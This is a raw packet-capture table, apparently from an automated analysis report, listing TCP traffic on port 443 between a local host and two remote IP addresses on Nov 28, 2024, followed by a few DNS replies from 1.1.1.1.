                                                                                                                                          Nov 28, 2024 11:33:18.458987951 CET4434989813.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:18.459088087 CET49898443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:18.459275007 CET49898443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:18.459290028 CET4434989813.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:18.828512907 CET443498505.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:18.828541040 CET443498505.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:18.828551054 CET443498505.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:18.828749895 CET49850443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:18.828778028 CET443498505.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:18.870287895 CET49850443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:18.892997026 CET4434989413.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:18.893605947 CET49894443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:18.893640995 CET4434989413.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:18.894062042 CET49894443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:18.894068003 CET4434989413.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:18.908130884 CET4434989313.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:18.908668041 CET49893443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:18.908705950 CET4434989313.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:18.909065962 CET49893443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:18.909071922 CET4434989313.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:19.234760046 CET443498965.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:19.235137939 CET49896443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:19.235193014 CET443498965.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:19.236067057 CET443498965.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:19.236402988 CET49896443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:19.236498117 CET443498965.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:19.236535072 CET49896443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:19.279354095 CET443498965.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:19.291070938 CET49896443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:19.327254057 CET4434989413.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:19.327333927 CET4434989413.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:19.327543020 CET49894443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:19.327579021 CET49894443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:19.327594995 CET4434989413.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:19.327635050 CET49894443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:19.327641010 CET4434989413.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:19.330761909 CET49899443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:19.330794096 CET4434989913.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:19.330869913 CET49899443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:19.331027985 CET49899443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:19.331039906 CET4434989913.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:19.352643013 CET4434989313.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:19.352701902 CET4434989313.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:19.352778912 CET49893443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:19.353615999 CET49893443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:19.353631973 CET4434989313.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:19.353643894 CET49893443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:19.353650093 CET4434989313.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:19.358453035 CET49900443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:19.358486891 CET4434990013.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:19.358566999 CET49900443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:19.358768940 CET49900443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:19.358783960 CET4434990013.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:19.420808077 CET4434989513.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:19.421343088 CET49895443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:19.421360970 CET4434989513.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:19.421801090 CET49895443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:19.421806097 CET4434989513.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:19.784780979 CET443498965.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:19.784806013 CET443498965.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:19.784812927 CET443498965.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:19.784858942 CET49896443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:19.784884930 CET443498965.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:19.785914898 CET49896443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:19.785955906 CET443498965.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:19.786003113 CET49896443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:19.786300898 CET49901443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:19.786315918 CET443499015.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:19.786384106 CET49901443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:19.786887884 CET49901443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:19.786906004 CET443499015.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:19.801295042 CET4434989713.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:19.801731110 CET49897443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:19.801745892 CET4434989713.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:19.802210093 CET49897443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:19.802213907 CET4434989713.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:19.864777088 CET4434989513.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:19.864835024 CET4434989513.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:19.864880085 CET49895443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:19.865056038 CET49895443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:19.865073919 CET4434989513.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:19.865086079 CET49895443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:19.865092993 CET4434989513.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:19.867791891 CET49902443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:19.867801905 CET4434990213.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:19.867880106 CET49902443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:19.868046045 CET49902443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:19.868057966 CET4434990213.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:20.106033087 CET49798443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:20.151336908 CET443497985.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:20.241898060 CET4434989813.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:20.242389917 CET49898443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:20.242404938 CET4434989813.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:20.242866039 CET49898443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:20.242871046 CET4434989813.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:20.246278048 CET4434989713.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:20.246339083 CET4434989713.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:20.246392965 CET49897443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:20.247176886 CET49897443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:20.247176886 CET49897443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:20.247189999 CET4434989713.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:20.247198105 CET4434989713.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:20.249898911 CET49903443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:20.249917984 CET4434990313.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:20.249985933 CET49903443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:20.250165939 CET49903443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:20.250178099 CET4434990313.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:20.686744928 CET4434989813.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:20.686825991 CET4434989813.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:20.686886072 CET49898443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:20.687053919 CET49898443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:20.687068939 CET4434989813.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:20.687084913 CET49898443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:20.687091112 CET4434989813.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:20.691667080 CET49904443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:20.691706896 CET4434990413.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:20.691786051 CET49904443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:20.691941023 CET49904443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:20.691955090 CET4434990413.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:21.138290882 CET4434990013.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:21.138829947 CET49900443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:21.138851881 CET4434990013.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:21.139300108 CET49900443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:21.139306068 CET4434990013.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:21.177103043 CET4434989913.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:21.177500010 CET49899443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:21.177525997 CET4434989913.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:21.177902937 CET49899443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:21.177907944 CET4434989913.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:21.239325047 CET443499015.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:21.239938974 CET49901443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:21.239948988 CET443499015.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:21.240384102 CET443499015.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:21.240499020 CET49901443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:21.241059065 CET443499015.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:21.241130114 CET49901443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:21.241383076 CET49901443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:21.241383076 CET49901443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:21.241446018 CET443499015.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:21.289191961 CET49901443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:21.289203882 CET443499015.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:21.335009098 CET49901443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:21.582591057 CET4434990013.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:21.582653046 CET4434990013.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:21.582942963 CET49900443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:21.582942963 CET49900443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:21.583168030 CET49900443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:21.583182096 CET4434990013.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:21.585766077 CET49905443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:21.585808039 CET4434990513.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:21.586070061 CET49905443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:21.586070061 CET49905443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:21.586100101 CET4434990513.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:21.630812883 CET4434989913.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:21.630863905 CET4434989913.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:21.631043911 CET49899443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:21.631083965 CET49899443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:21.631083965 CET49899443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:21.631103992 CET4434989913.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:21.631113052 CET4434989913.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:21.633044004 CET49906443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:21.633071899 CET4434990613.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:21.633256912 CET49906443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:21.633256912 CET49906443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:21.633282900 CET4434990613.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:21.652005911 CET4434990213.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:21.652976036 CET49902443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:21.652998924 CET4434990213.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:21.653330088 CET49902443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:21.653336048 CET4434990213.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:21.802885056 CET443499015.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:21.802911043 CET443499015.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:21.802920103 CET443499015.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:21.802956104 CET443499015.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:21.802995920 CET49901443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:21.803014040 CET443499015.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:21.803046942 CET49901443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:21.820059061 CET443499015.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:21.820113897 CET443499015.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:21.820307970 CET49901443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:21.820317030 CET443499015.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:21.820386887 CET49901443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:21.820956945 CET49901443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:21.820956945 CET49907443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:21.821005106 CET443499075.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:21.821044922 CET443499015.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:21.821531057 CET443499015.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:21.821640968 CET49907443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:21.821646929 CET49901443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:21.821646929 CET49901443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:21.821881056 CET49907443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:21.821896076 CET443499075.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:22.049063921 CET4434990313.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:22.049992085 CET49903443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:22.049993038 CET49903443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:22.050018072 CET4434990313.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:22.050026894 CET4434990313.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:22.096333981 CET4434990213.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:22.096389055 CET4434990213.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:22.096611977 CET49902443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:22.096611977 CET49902443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:22.097034931 CET49902443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:22.097043991 CET4434990213.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:22.099136114 CET49908443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:22.099158049 CET4434990813.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:22.099257946 CET49908443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:22.099802971 CET49908443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:22.099812031 CET4434990813.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:22.407970905 CET4434990413.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:22.408399105 CET49904443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:22.408416986 CET4434990413.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:22.408848047 CET49904443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:22.408854008 CET4434990413.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:22.493452072 CET4434990313.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:22.493526936 CET4434990313.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:22.493697882 CET49903443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:22.493808985 CET49903443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:22.493815899 CET4434990313.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:22.493825912 CET49903443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:22.493829966 CET4434990313.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:22.497123003 CET49909443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:22.497147083 CET4434990913.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:22.497232914 CET49909443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:22.497378111 CET49909443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:22.497390985 CET4434990913.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:22.844264030 CET4434990413.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:22.844337940 CET4434990413.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:22.844392061 CET49904443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:22.844561100 CET49904443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:22.844582081 CET4434990413.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:22.844592094 CET49904443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:22.844599009 CET4434990413.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:22.847095966 CET49910443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:22.847131014 CET4434991013.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:22.847197056 CET49910443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:22.847335100 CET49910443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:22.847347975 CET4434991013.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:23.234978914 CET443499075.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:23.235280991 CET49907443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:23.235325098 CET443499075.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:23.235975027 CET443499075.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:23.236028910 CET49907443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:23.236704111 CET443499075.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:23.236752987 CET49907443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:23.236895084 CET49907443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:23.236953974 CET443499075.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:23.237025976 CET49907443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:23.237046003 CET49907443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:23.237051964 CET443499075.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:23.237123966 CET49907443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:23.356545925 CET4434990613.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:23.357037067 CET49906443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:23.357064009 CET4434990613.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:23.357501984 CET49906443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:23.357506990 CET4434990613.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:23.367428064 CET4434990513.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:23.367686033 CET49905443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:23.367714882 CET4434990513.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:23.368103981 CET49905443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:23.368108034 CET4434990513.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:23.792150021 CET4434990613.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:23.792234898 CET4434990613.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:23.792361021 CET49906443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:23.792454958 CET49906443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:23.792479038 CET4434990613.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:23.792490959 CET49906443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:23.792500019 CET4434990613.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:23.795651913 CET49911443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:23.795681000 CET4434991113.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:23.795758009 CET49911443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:23.795957088 CET49911443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:23.795972109 CET4434991113.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:23.811626911 CET4434990513.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:23.811695099 CET4434990513.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:23.811770916 CET49905443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:23.811928034 CET49905443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:23.811928034 CET49905443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:23.811940908 CET4434990513.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:23.811949968 CET4434990513.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:23.814285040 CET49912443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:23.814327002 CET4434991213.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:23.814524889 CET49912443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:23.814524889 CET49912443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:23.814572096 CET4434991213.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:23.816713095 CET4434990813.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:23.817106009 CET49908443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:23.817131042 CET4434990813.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:23.817540884 CET49908443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:23.817547083 CET4434990813.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:24.251828909 CET4434990813.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:24.251929045 CET4434990813.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:24.251986980 CET49908443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:24.252137899 CET49908443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:24.252151012 CET4434990813.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:24.252161980 CET49908443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:24.252167940 CET4434990813.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:24.254878044 CET49913443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:24.254908085 CET4434991313.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:24.255023003 CET49913443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:24.255170107 CET49913443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:24.255183935 CET4434991313.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:24.280010939 CET4434990913.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:24.280427933 CET49909443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:24.280450106 CET4434990913.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:24.280880928 CET49909443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:24.280885935 CET4434990913.107.246.63192.168.2.4
                                                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                                                          Nov 28, 2024 11:32:01.232362032 CET53554171.1.1.1192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:01.234302044 CET53506491.1.1.1192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:04.550930023 CET53579191.1.1.1192.168.2.4
